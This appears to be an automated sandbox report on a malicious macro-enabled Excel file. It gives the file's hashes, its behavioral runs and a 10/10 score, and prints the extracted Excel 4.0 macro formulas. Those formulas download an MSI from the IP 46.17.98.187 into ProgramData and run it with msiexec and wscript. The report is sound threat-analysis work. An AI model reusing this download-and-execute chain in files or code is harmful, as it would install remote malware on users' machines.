General
-
Target
7395615d46a795b61c1ef4b0104ab4c4
-
Size
6KB
-
Sample
231222-gn21saabfm
-
MD5
7395615d46a795b61c1ef4b0104ab4c4
-
SHA1
43d91072f07b040d96aa69deb7e5b19c8f5c4b39
-
SHA256
66fbe0d7434c7d9f1d801bdc2270a83b0fe575d1cae1066d480cbc5322ad5fbb
-
SHA512
85ec2c75b5c2b0e18ce926a14729720f923ea8154edea2d60e097d1b041293a9a87e2fdfa2660a3d824da592a8dc4e39f5b8f8a83da45c73f0aa5a1a82d29f5c
-
SSDEEP
192:NDSGuS+1aEOmmfRL8UhHFBFYutb98yu10s:NNuvwZ1FY8b98yuKs
Static task
static1
Behavioral task
behavioral1
Sample
7395615d46a795b61c1ef4b0104ab4c4.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
7395615d46a795b61c1ef4b0104ab4c4.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187
-
formulas
=EXEC("msiexec.exe")
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187","C:\ProgramData\uluculus.msi",0,0)
=EXEC("wscript C:\ProgramData\start.vbs")
=HALT()
Targets
Score
10/10
-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-